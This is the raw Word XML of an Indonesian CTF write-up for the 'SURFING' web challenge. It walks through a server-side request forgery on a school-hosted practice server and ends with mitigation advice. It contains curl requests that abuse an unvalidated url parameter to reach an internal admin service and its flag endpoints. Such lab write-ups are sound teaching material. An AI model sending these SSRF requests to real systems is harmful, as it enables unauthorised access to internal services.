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before="480" w:after="12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CTF WRITE-UP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:after="8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SURFING — 300 Points</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="D5E8F0" w:val="clear"/>
        <w:spacing w:after="480"/>
        <w:jc w:val="center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Category: Web Exploitation  |  Technique: SSRF (Server-Side Request Forgery)</w:t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Challenge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SURFING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Exploitation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Teknik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Request Forgery (SSRF)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http://ctf.smkn1adw.sch.id:8001/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Deskripsi Challenge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Kami baru saja meluncurkan sistem manajemen tiket selancar internal. Aplikasi ini memiliki fitur pengecekan status tiket secara real-time. Dapatkah Anda menembus keamanan internal dan menemukan flag rahasianya?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pP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Tampilan Website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Halaman Buy Ticket (/buy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="8858250" cy="447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Gambar 1 - Halaman Buy Ticket dengan form User ID dan Surfing Date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Halaman Check Ticket Status (/status)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="8858250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Gambar 2 - Halaman Check Ticket Status dengan form Ticket ID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Halaman Ticket Information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="8858250" cy="4371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Gambar 3 - Hasil pengecekan tiket menampilkan detail informasi tiket</w:t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Analisis Kerentanan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Identifikasi SSRF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Dari hasil observasi awal pada aplikasi, ditemukan tiga endpoint utama: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 — Halaman utama Surfing Ticket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/buy — Form pembelian tiket (User ID + Surfing Date)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/status?ticket_id= — Pengecekan status tiket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Dengan mengakses endpoint /api/tickets, ditemukan bahwa beberapa tiket memiliki user_id berupa URL (misalnya http://127.0.0.1/flag.txt). Ini menunjukkan bahwa field user_id pada form /buy dapat digunakan sebagai vektor SSRF — server akan melakukan request ke URL yang dimasukkan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pP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Langkah Eksploitasi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Enumerasi API Endpoint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Pertama, akses endpoint /api/tickets untuk melihat semua tiket yang ada:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E75B6" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:shd w:fill="F8F9FA" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D63384"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -s http://ctf.smkn1adw.sch.id:8001/api/tickets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Dari response JSON tersebut, terlihat bahwa beberapa tiket memiliki user_id berupa URL. Ini mengonfirmasi adanya kerentanan SSRF.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Menemukan Endpoint /api/check-status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Ditemukan endpoint tersembunyi /api/check-status yang menerima parameter url untuk melakukan fetch ke URL internal:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E75B6" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:shd w:fill="F8F9FA" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D63384"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl "http://ctf.smkn1adw.sch.id:8001/api/check-status?url=http://surfing_internal:8081/"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Response menunjukkan halaman Internal Admin Service dengan navigasi ke /admin, /api/flag, dll. Ini membuktikan adanya service internal bernama surfing_internal pada port 8081.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Mencoba /api/flag (Fake Flag)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Percobaan pertama mengakses /api/flag menghasilkan fake flag:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E75B6" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:shd w:fill="F8F9FA" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D63384"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl "http://ctf.smkn1adw.sch.id:8001/api/check-status?url=http://surfing_internal:8081/api/flag"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Response: {"flag": "ADB{FAKE_FLAG}"}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Flag ini adalah jebakan yang dipasang di endpoint publik internal.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 — Akses /admin untuk Flag Asli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Flag asli tersembunyi di endpoint /admin yang hanya bisa diakses via SSRF:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E75B6" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:shd w:fill="F8F9FA" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D63384"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl "http://ctf.smkn1adw.sch.id:8001/api/check-status?url=http://surfing_internal:8081/admin"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pP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Ringkasan Alur Serangan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Akses /api/tickets → Konfirmasi SSRF via user_id berupa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Temukan endpoint /api/check-status?url= sebagai titik SSRF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Gunakan SSRF untuk akses internal service: surfing_internal:8081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/api/flag → mengembalikan ADB{FAKE_FLAG} (jebakan)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/admin → mengembalikan flag asli</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pP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Flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1F4E79" w:val="clear"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diperoleh dari: /api/check-status?url=http://surfing_internal:8081/admin</w:t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Kesimpulan &amp; Mitigasi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Kerentanan SSRF pada challenge ini terjadi karena server tidak memvalidasi atau memfilter URL yang diterima melalui parameter url pada endpoint /api/check-status. Akibatnya, attacker dapat memaksa server untuk mengakses resource internal yang seharusnya tidak bisa diakses dari luar.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Mitigasi yang disarankan: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Whitelist URL yang diizinkan — hanya izinkan domain/IP tertentu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Blokir akses ke IP private (127.0.0.1, 10.x.x.x, 172.16.x.x, 192.168.x.x)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Gunakan network segmentation untuk memisahkan service internal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Jangan expose endpoint /api/check-status ke publik tanpa autentikasi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a92bd4aef715cb6f35c597968f4a4e9412d4e508.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/99fe7c42e069c10ff3a954233d0d9d3825ba033b.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/71b022dec33d009196d6445ae43f9f98b11a535e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2026-03-10T02:37:16.863Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-10T02:37:16.864Z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